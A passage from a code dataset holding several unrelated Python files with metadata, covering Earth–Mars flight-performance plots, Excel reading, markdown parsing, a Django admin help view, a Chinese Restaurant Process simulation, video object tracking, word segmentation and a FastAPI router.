"540072042", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport scipy.optimize as sp\n\n\nge = 9.81\ngm = 3.711\n\nrhoe = 1.225\nrhom = 0.01457\n\nmum = 1.422*10**-5\nmue = 1.789*10**-5\n\nvm = mum/rhom\nve = mue/rhoe\n\nc = 0.20\n\nVMrange = np.arange(10, 200.1,0.1)\n\nVErange = np.arange(1, 50.05, 0.05)\n\n\ndef func1(VE):\n out = (gm/ge)*(rhoe/rhom)*VE*VE/math.log((VE*c/(100*ve)),10)\n return out\ndef func2(VM):\n out = VM*VM/math.log(VM*c/(100*vm),10) - func1(VE)\n return out\n\nhrange = np.linspace(0, 10000, 5)\nfor j in range(len(hrange)):\n H = hrange[j]\n Tm = -31 - 0.000998*H\n Te = 15.04 - 0.00649*H\n\n pm = 0.699*math.exp(-0.00009*H)\n pe = 101.29*((Te+273.1)/288.08)**5.256\n\n rhom = pm/(0.1921*(Tm + 273.1))\n rhoe = pe/(0.2869*(Te + 273.1))\n\n\n PRe = []\n PRm = []\n Frac = []\n R = []\n ym = []\n ye = []\n\n for i in range(len(VErange)):\n VE = VErange[i]\n thinge = func1(VE)\n\n #Finding the root of the function calculating the velocity fraction depending on earth cruise speed\n\n VM = float(sp.brentq(func2, 1, 1000))\n ye.append(VM/VE)\n ym.append(VM)\n Ree = VE*c/ve\n Rem = VM*c/vm\n frac = math.sqrt((math.log(Ree/100)/math.log(Rem/100))*((gm/ge)**3)*(rhoe/rhom))\n Rfrac = (ge/gm)*(math.log(VM*c/(100*vm),10)/math.log(VE*c/(100*ve),10))\n Cd = 1.15*2*0.075/(math.log(Ree/100)**2)\n Pre = 0.5*rhoe*Cd*30*VE*VE*VE\n Prm = Pre*frac\n PRe.append(Pre)\n PRm.append(Prm)\n Frac.append(frac)\n R.append(Rfrac)\n\n fontsize = 20\n plt.subplot(221)\n plt.plot(VErange, ye, label = 'Altitude: '+str(H)+'m')\n plt.title('Earth cruise velocity vs V-fraction')\n plt.xlabel(r'$V_{C_E}[\\frac{m}{s}]$',fontsize = fontsize)\n plt.ylabel(r'$\\frac{V_{C_M}}{V_{C_E}}$', fontsize = fontsize)\n plt.grid()\n\n plt.subplot(222)\n plt.plot(VErange, ym, label = 'Altitude: '+str(H)+'m')\n plt.title(r'$V_{C_E}$'+'vs'+r'$V_{C_M}$')\n plt.xlabel(r'$V_{C_E}[\\frac{m}{s}]$', fontsize = fontsize)\n plt.ylabel(r'$V_{C_M}[\\frac{m}{s}]$', fontsize = fontsize)\n plt.grid()\n\n plt.subplot(223)\n plt.title('Range fraction')\n plt.plot(VErange, R, label = 'Altitude: '+str(H)+'m')\n plt.xlabel(r'$V_{C_E}[\\frac{m}{s}]$', fontsize = fontsize)\n plt.ylabel(r'$\\frac{R_M}{R_E}$', fontsize = fontsize)\n # plt.subplot(223)\n # plt.title('Power Fraction')\n # plt.plot(PRe, Frac)\n # plt.xlabel(r'$V_E$', fontsize = fontsize)\n # plt.ylabel(r'$\\frac{P_{R_M}}{P_{R_E}}$', fontsize = fontsize)\n plt.grid()\n plt.subplot(224)\n plt.plot(PRe, PRm, label = 'Altitude: '+str(H)+'m')\n plt.xlabel(r'$P_{R_E}[W]$', fontsize = fontsize)\n plt.ylabel(r'$P_{R_M}[W]$', fontsize = fontsize)\n plt.grid()\n plt.legend(loc = 4)\nplt.show()", "sub_path": "concept/single/Comparison.py", "file_name": "Comparison.py", "file_ext": "py", "file_size_in_byte": 2793, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.arange", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 23, "usage_type": "call"}, {"api_name": "math.log", "line_number": 27, "usage_type": "call"}, {"api_name": "math.log", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 33, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.optimize.brentq", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 59, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 64, "usage_type": "call"}, {"api_name": 
"math.log", "line_number": 64, "usage_type": "call"}, {"api_name": "math.log", "line_number": 65, "usage_type": "call"}, {"api_name": "math.log", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.ylabel", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "653465890", "text": "\nimport xlrd\n\n\ndef read_excel_dict(file):\n l = []\n wb = xlrd.open_workbook(filename=file) # 打开文件\n # print(wb.sheet_names()) # 获取所有表格名字\n\n sheet1 = wb.sheet_by_index(0) # 通过索引获取表格\n # print(sheet1)\n # print(sheet1.name, sheet1.nrows, sheet1.ncols)\n\n for i in range(1, sheet1.nrows):\n # l.append(sheet1.row_values(i))\n d = {}\n for j in range(sheet1.ncols):\n d[sheet1.row_values(0)[j]] = sheet1.row_values(i)[j]\n l.append(d)\n\n # print(l)\n return l\n\n\ndef read_excel_list(file):\n l = []\n wb = xlrd.open_workbook(filename=file) # 打开文件\n\n sheet1 = wb.sheet_by_index(0) # 通过索引获取表格sheet页\n for i in range(1, sheet1.nrows):\n d = sheet1.row_values(i) # 通过行号获取内容\n l.append(d) # 添加行里面的内容\n return l\n\n\nif __name__ == '__main__':\n excel_list = read_excel_list('test.xlsx')\n print(excel_list)", "sub_path": "day04/read_excel.py", "file_name": "read_excel.py", "file_ext": "py", "file_size_in_byte": 976, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "xlrd.open_workbook", "line_number": 7, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "479003947", "text": "'''This script will parse the current known issues topic from Azure Stack. \nThe script doesn't validate. The best approach might have been to convert.\n\n10/14/2020\n\n'''\n\nfrom bs4 import BeautifulSoup\nimport markdown\nfrom markupsafe import Markup, escape\nimport csv\n\n# update variables\n\nKNOWNISSUES = r\"C:\\git\\mb\\azs-modular-poc\\data\\working\\2005_known_issues.md\"\nKNOWNISSUESTABLE = \"C:\\\\git\\\\mb\\\\azs-modular-poc\\\\data\\\\reports\\\\raw_parse_2005_known_issues.csv\"\n\n\ndef get_textfromMD(path):\n '''Return text from a MD filename path'''\n textout = \"\"\n fh = open(path, \"r\")\n for line in fh:\n textout += line\n fh.close()\n return textout\n\n\ndef write_csv(outbody, path):\n '''Write CSV file to the path.'''\n csvout = open(path, 'w', newline=\"\")\n csvwrite = csv.writer(csvout)\n for r in outbody:\n try:\n csvwrite.writerow(r)\n except Exception as e:\n print(\"An error: {}\".format(e))\n csvout.close()\n\n\ndef main():\n '''This is the main logic of parsing the known issues markdown file.'''\n rawtext = get_textfromMD(KNOWNISSUES)\n htmlfile = markdown.markdown(rawtext)\n soup = BeautifulSoup(htmlfile, 'html.parser')\n\n knownissuestable = []\n knownissuestable.append([\"area\", \"title\", \"applicable\", \"cause\", \"remediation\", \"occurance\"])\n\n # get area body\n body_html_string = soup.prettify()\n areas = body_html_string.split(\"
<h2
\")\n for a in areas:\n a = \"
<h2
\" + a\n a_soup = BeautifulSoup(a,'html.parser')\n area = a_soup.findAll(\"h2\")[0].get_text().strip()\n bodies_string = a_soup.prettify()\n bodies = bodies_string.split(\"
<h3
\")\n record = []\n for b in bodies:\n b = \"
<h3
\" + b\n b_soup = BeautifulSoup(b,'html.parser')\n title = escape(b_soup.findAll(\"h3\")[0].get_text().strip())\n print(\"Getting {}...\".format(title))\n raw_body = escape(b_soup.get_text()).replace(\"\\n\", \"\\\\n\")\n raw_body = escape(b_soup.get_text()).replace(\"\\\\n\\\\n\", \"\\\\n\")\n raw_body = \" \".join(raw_body.split())\n if raw_body.find(\"Applicable\") > 0: \n applicable = raw_body[raw_body.find(\"Applicable\")+11:raw_body.find(\"Cause\")].strip()\n else:\n applicable = \"NA\"\n if raw_body.find(\"Cause\") > 0:\n cause = raw_body[raw_body.find(\"Cause\")+6:raw_body.find(\"Remediation\")].strip()\n else:\n cause = \"NA\"\n if raw_body.find(\"Remediation\") > 0:\n remediation = raw_body[raw_body.find(\"Remediation\")+12:raw_body.find(\"Occurrence\")].strip()\n else:\n remediation = \"NA\"\n if raw_body.find(\"Occurrence\") > 0:\n index_occ_start = raw_body.find(\"Occurrence\")+11\n index_occ_end = raw_body[index_occ_start:].find(\"\\n\")\n occurrence = raw_body[index_occ_start:index_occ_end].strip()\n else:\n occurrence = \"NA\"\n record = [area, title, applicable, cause, remediation, occurrence]\n knownissuestable.append(record)\n write_csv(knownissuestable, KNOWNISSUESTABLE)\n\n\nif __name__ == \"__main__\":\n main()\n\n", "sub_path": "scripts/migrate/parse_2005_known_issues.py", "file_name": "parse_2005_known_issues.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "csv.writer", "line_number": 32, "usage_type": "call"}, {"api_name": "markdown.markdown", "line_number": 44, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 55, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 62, "usage_type": "call"}, {"api_name": "markupsafe.escape", "line_number": 63, "usage_type": "call"}, {"api_name": "markupsafe.escape", "line_number": 65, "usage_type": "call"}, {"api_name": "markupsafe.escape", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "545453769", "text": "from django.contrib import admin\nfrom django.conf.urls import url\nfrom django.shortcuts import render\n\n__all__ = ['HAASAdmin']\n\nclass HAASAdmin(admin.ModelAdmin):\n \"\"\"\n Provide Help Menus in Admin Site\n \n The default admin site is pretty sparse. Lots of Postgres-related concepts\n should be explained for uninitiated, and yet those elements are missing \n from the admin. 
This override for the base model admin class provides\n context-sensitive help to describe usage scenarios.\n\n Each module can have a help template located at:\n \n templates/admin/haas/[module]/help.html\n \"\"\"\n\n def get_urls(self):\n urls = super(HAASAdmin, self).get_urls()\n my_urls = [\n url(r'^help/$', self.help),\n ]\n return my_urls + urls\n\n def help(self, request):\n \"\"\"\n Display the Proper Help Template Corresponding to the Active Module\n \"\"\"\n context = dict(\n self.admin_site.each_context(request),\n app_label = self.model._meta.app_label,\n opts = self.model._meta\n )\n modname = str(request.path.split('/')[-3])\n return render(request, 'admin/haas/' + modname + '/help.html', context)\n", "sub_path": "haas/admin/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "46619547", "text": "\"\"\"Chinese Restaurant Process\n\nThis script simulates CRP and plots 3 snapshot-plots \ndepicting changes in the clusters\n\"\"\"\nimport numpy as np\nfrom numpy.random import dirichlet, multivariate_normal, choice\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nimport sys\n\n\ndef normalize(urn_contents):\n urn_contents = [vals for vals in urn_contents.values()]\n\n sum_contents = np.sum(urn_contents)\n return np.array(urn_contents) / sum_contents\n\n\nalpha = 5\n\"\"\"\ndict format: component_num -> # of nodes in cluster\n'component 0' corresponds to the \"special ball\" (in Polya Urn terminology)\n'alpha': weight associated with the special ball\n\"\"\"\nurn_contents = dict({0: alpha, 1: 1})\ncluster_counter = 2\n\nfig, ax = plt.subplots(1, 3, figsize=(12, 6), sharey=True)\nfor i in range(3):\n ax[i].xaxis.set_major_locator(MaxNLocator(integer=True))\n\nplot_itr = 0\n\nfor itr in range(1, 100):\n cluster_ids = [cl_id for cl_id in urn_contents.keys()]\n ball_chosen = choice(cluster_ids, p=normalize(urn_contents))\n if ball_chosen == 0:\n # add new ball\n urn_contents[cluster_counter] = 1\n cluster_counter += 1\n else:\n urn_contents[ball_chosen] += 1\n\n if itr % 25 == 0:\n ax[plot_itr].bar(urn_contents.keys(), urn_contents.values())\n ax[plot_itr].set_title('CRP with {} iterations'.format(itr))\n ax[plot_itr].set_xlabel('Component number')\n ax[plot_itr].set_ylabel('# of points')\n plot_itr += 1\n\nplt.show()\n", "sub_path": "Dirichlet_process/crp.py", "file_name": "crp.py", "file_ext": "py", "file_size_in_byte": 1495, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.sum", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 52, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "25356284", "text": "from GT_Analyse import getGroundTruth\nfrom collections import deque\nimport cv2\nimport utils_iou as utils\nfrom utils_iou import createTracker\n#import scripts.recognizer as rec\nfrom collections import Counter\nimport sys\nimport time\n\n'''\nAnnotate the frame with 'tracking' and 'detecting'.\nWhen doing detecting, the frame freeze, and will jump to the latest frame after detecting\n\nJuly 21, 2020\n'''\n\ndef runDetection(r, img):\n rs = r.recognizeNP(img)\n ds = []\n for i, r in enumerate(rs[0]):\n ds.append(utils.BoundingBox(r, rs[2][i]))\n return ds\n\ndef retrieveGroundTruth(ob_idxs, objs, fid):\n ret = []\n cls = 'person'\n for ob in ob_idxs:\n ret.append(utils.BoundingBox(cls, objs[ob].trajectory[objs[ob].frames.index(fid)], ob))\n return ret\n\ndef BB2Str(bb):\n return '%d %d %d %d'%(bb.box[0], bb.box[1], bb.box[2], bb.box[3])\n\nif __name__ == '__main__' :\n\n #rc = rec.Recognizer('ssd_mobilenet_v1_coco_2018_01_28')\n #rc = rec.Recognizer()\n SLEEP_TIME = 0#0.5\n\n n = 10 #the size of the matrix\n lag = 4\n matrix = [[(0, 0)] * (lag + 1) for _ in range(n + 1)] #every element of the matrix will be (average_precision, number_of_frames)\n \n #set up file paths\n VIDEO = sys.argv[1] if len(sys.argv) > 1 else 'basketball'\n #VIDEO = 'india'\n #VIDEO = 'basketball'\n #VIDEO = 'biking'\n #VIDEO = 'output'\n\n FILE_NAME = 'gt_basketball_fps_10_0-130.txt' if VIDEO == 'basketball' else 'gt_india_fps_10_0-130.txt' if VIDEO == 'india' else 'gt_biking_fps_10_0-130.txt'\n #FILE_NAME = 'gt_basketball_fps_10_0-130.txt'\n #FILE_NAME = 'gt_india_fps_10_0-130.txt'\n\n #set up the number of frames the tracker should track\n FPS = 10\n INTERVAL = 1000 / FPS\n KEEP_OD = len(sys.argv) > 2\n GAP = 1 if KEEP_OD else 4 #For GAP, it means the number of frame between two detection, which is inclusive\n\n #start to use KEEP_OD after those frames\n START = lag\n gts = []\n\n #choose tracker\n tracker_types = ['BOOSTING', 'MIL','KCF', 'TLD', 'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT']\n tracker_type = tracker_types[2]\n\n # Read video\n video = cv2.VideoCapture(\"test_data/\" + VIDEO + \".mp4\")\n \n # Exit if video not opened.\n if not video.isOpened():\n print(\"Could not open video\")\n sys.exit()\n \n #Trackers\n trackers = deque()\n \n ct = 0\n record = 0\n\n frames, objs = getGroundTruth(FILE_NAME)\n old_frame = 0\n\n while True:\n time.sleep(SLEEP_TIME)\n ct += 1\n video.set(cv2.CAP_PROP_POS_MSEC, ct * INTERVAL)\n\n # Read a new frame\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file or video ends')\n break\n \n #create ground truth\n #gts = [runDetection(rc, frame)] + gts\n gts = [retrieveGroundTruth(frames[ct], objs, ct)] + gts\n\n if len(gts) > lag + 1:\n gts.pop()\n\n gt = gts[-1] #all trackers are initialized with stale object position\n\n dif = ct - record\n tmp = []\n if dif <= lag:\n if ct > lag: \n frame = old_frame.copy()\n cv2.putText(frame, str(ct) + \" detecting\", (100,50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2);\n elif dif <= GAP + lag:\n if dif == lag + 1 and gt:\n if GAP > 1:\n trackers = []\n for g in gt:\n if g.cls != 'person': #only test person\n continue\n t = createTracker(tracker_type)\n box = list(g.box)\n box[2] -= box[0]\n box[3] -= box[1]\n t.init(old_frame, tuple(box))\n trackers.append(t)\n tmp = gt\n else:\n #average number of trackers is 9.8 for basketball\n #print(len(trackers))\n for t in trackers:\n #tracker update 16.35ms\n 
#start_time = time.time()\n ok, bx = t.update(frame)\n #print((time.time() - start_time) * 1000)\n if ok:\n bx = list(bx)\n bx[2], bx[3] = bx[0] + bx[2], bx[1] + bx[3]\n tmp.append(utils.BoundingBox('person', tuple(bx)))\n if dif == GAP + lag:\n old_frame = frame.copy()\n cv2.putText(frame, str(ct) + \" tracking \", (100,50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2);\n for ti in tmp:\n p1 = (int(ti.box[0]), int(ti.box[1]))\n p2 = (int(ti.box[2]), int(ti.box[3]))\n cv2.rectangle(frame, p1, p2, (255,0,0), 2, 1)\n\n\n if ct - record >= GAP + lag:\n record = ct\n\n # Display result\n cv2.imshow(\"Tracking\", frame)\n # Exit if ESC pressed\n k = cv2.waitKey(1) & 0xff\n if k == 27 : break\n\n", "sub_path": "tracking_proto.py", "file_name": "tracking_proto.py", "file_ext": "py", "file_size_in_byte": 4955, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils_iou.BoundingBox", "line_number": 22, "usage_type": "call"}, {"api_name": "utils_iou.BoundingBox", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 76, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 79, "usage_type": "call"}, {"api_name": "GT_Analyse.getGroundTruth", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_POS_MSEC", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 112, "usage_type": "attribute"}, {"api_name": "utils_iou.createTracker", "line_number": 120, "usage_type": "call"}, {"api_name": "utils_iou.BoundingBox", "line_number": 138, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 141, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 141, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 145, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 154, "usage_type": "call"}]} +{"seq_id": "411335495", "text": "# encoding = utf-8\nimport jieba\nimport jieba.posseg as jbp\nfrom collections import Counter\nimport nltk\nimport string\nimport re\nfrom nltk.corpus import stopwords\nfrom nltk.probability import FreqDist\nimport collections\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.corpus import wordnet\n\n\n# 频率统计\n# @author LELE,LU\ndef word_count(datalist):\n c = Counter()\n word_list = []\n for x in datalist:\n if len(x[\"word\"]) > 1:\n c[x[\"word\"]] += 1\n for (k, v) in c.most_common():\n key = jbp.cut(k)\n for x in key:\n word_str = \"\"\n var = str(v)\n # print(type(var))\n word_dict = dict(word=k, count=v, word_type=x.flag)\n word_str = word_dict[\"word\"] + \"+\" + word_dict[\"word_type\"] + \"+\" + var\n word_list.append(word_str)\n return word_list\n\n\n# 中文分词\ndef chinese_cut(file_name):\n chg_4 = []\n chg_6 = []\n for c in open(\"chg4.txt\", encoding=\"gbk\"):\n if c != ' ':\n chg_4.append(c.strip(\"\\n\"))\n for c in open(\"chg6.txt\", encoding=\"gbk\"):\n if c != ' ':\n chg_6.append(c.strip(\"\\n\"))\n keyword_list = []\n # 停用词列表\n stop_word_list = []\n # 加载停用词\n 
for word in open(\"stop_words.txt\"):\n stop_word_list.append(word.strip(\"\\n\"))\n with open(file_name, encoding=\"utf-8\") as f:\n data = f.read()\n for x in jbp.cut(data):\n if x.flag != 'x' and x.flag != 'm' and x.word not in stop_word_list:\n # print(x.word, x.flag)\n word_dict = dict(word=x.word, word_type=x.flag, count=1)\n if x.word in chg_4:\n word_dict[\"level\"] = \"四级\"\n elif x.word in chg_6:\n word_dict[\"level\"] = \"六级\"\n else:\n word_dict[\"level\"] = \"其他\"\n keyword_list.append(word_dict)\n return keyword_list\n\n\n# 获取词性\ndef get_wordnet_pos(tag):\n if tag.startswith('J'):\n return wordnet.ADJ\n elif tag.startswith('V'):\n return wordnet.VERB\n elif tag.startswith('N'):\n return wordnet.NOUN\n elif tag.startswith('R'):\n return wordnet.ADV\n else:\n return None\n\n\n# 英文分词\ndef english_cut(file_name):\n word_list = []\n final_word = []\n words_list = []\n # 四级英语词表\n wnl = WordNetLemmatizer()\n eng_4 = []\n eng_6 = []\n for e in open(\"eng4.txt\", encoding='ISO8859-1'):\n if e != \" \":\n eng_4.append(e.strip(\"\\n\"))\n for e in open(\"eng6.txt\", encoding='ISO8859-1'):\n if e != \" \":\n eng_6.append(e.strip(\"\\n\"))\n # print(eng_4)\n with open(file_name, \"r\") as f:\n data = f.read()\n rule = re.compile(\"[0-9.?!,]\")\n data = rule.sub('', data)\n # 进入队列\n old_words = nltk.word_tokenize(data)\n for w in old_words:\n word_list.append(w)\n # 去除停用字和缩写\n filter_words = [word for word in word_list if\n word not in stopwords.words('english') and word != \"'s\" and word != \"'\"]\n # print(filter_words)\n final_word = nltk.pos_tag(filter_words)\n for x in set(final_word):\n c = final_word.count(x)\n # 单词还原\n word_post = get_wordnet_pos(x[1]) or wordnet.NOUN\n original_word = wnl.lemmatize(x[0], pos=word_post)\n # print(original_word)\n word_dict = dict(word=original_word, word_type=x[1], count=c)\n if x[0] in eng_4:\n word_dict[\"level\"] = \"四级\"\n elif x[0] in eng_6:\n word_dict[\"level\"] = \"六级\"\n else:\n word_dict[\"level\"] = \"其他\"\n words_list.append(word_dict)\n # print(words_list)\n return words_list\n\n\ndef write_txt(file_name,data):\n with open(file_name,'w') as f:\n f.writelines(data)\n\n\nif __name__ == \"__main__\":\n all_words = chinese_cut(\"dirty_data.txt\")+english_cut(\"dirty_data_eng.txt\")\n # all_words = english_cut(\"dirty_data_eng.txt\")\n # print(english_cut(\"dirty_data_eng.txt\"))\n dataset = []\n for words in all_words:\n data = words[\"word\"]+\"+\"+words[\"word_type\"]+\"+\"+str(words[\"count\"])+\"+\"+words[\"level\"]+\"\\n\"\n dataset.append(data)\n write_txt(\"dataset.txt\",dataset)\n print(all_words)\n", "sub_path": "before/wordSolve/wordutil.py", "file_name": "wordutil.py", "file_ext": "py", "file_size_in_byte": 4438, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.Counter", "line_number": 19, "usage_type": "call"}, {"api_name": "jieba.posseg.cut", "line_number": 25, "usage_type": "call"}, {"api_name": "jieba.posseg", "line_number": 25, "usage_type": "name"}, {"api_name": "jieba.posseg.cut", "line_number": 54, "usage_type": "call"}, {"api_name": "jieba.posseg", "line_number": 54, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.ADJ", "line_number": 71, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 71, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.VERB", "line_number": 73, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 73, "usage_type": "name"}, {"api_name": 
"nltk.corpus.wordnet.NOUN", "line_number": 75, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 75, "usage_type": "name"}, {"api_name": "nltk.corpus.wordnet.ADV", "line_number": 77, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 77, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 88, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 103, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 108, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 108, "usage_type": "name"}, {"api_name": "nltk.pos_tag", "line_number": 110, "usage_type": "call"}, {"api_name": "nltk.corpus.wordnet.NOUN", "line_number": 114, "usage_type": "attribute"}, {"api_name": "nltk.corpus.wordnet", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "200367750", "text": "from fastapi import APIRouter, Depends, HTTPException\nfrom typing import List\n\nfrom .. import models\nfrom ..schemas import schemas\nfrom ..database import SessionLocal\nfrom sqlalchemy.orm import Session\n\n\nfrom ..dependencies import get_current_user\n\n\nrouter = APIRouter(\n prefix=\"/users\",\n tags=[\"users\"],\n dependencies=[Depends(get_current_user)]\n)\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n\n@router.get(\"/\", response_model=List[schemas.User])\nasync def read_users(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n users = db.query(models.User).offset(skip).limit(limit).all()\n return users\n\n\n@router.get(\"/get-files\", response_model=schemas.File)\nasync def read_files(db: 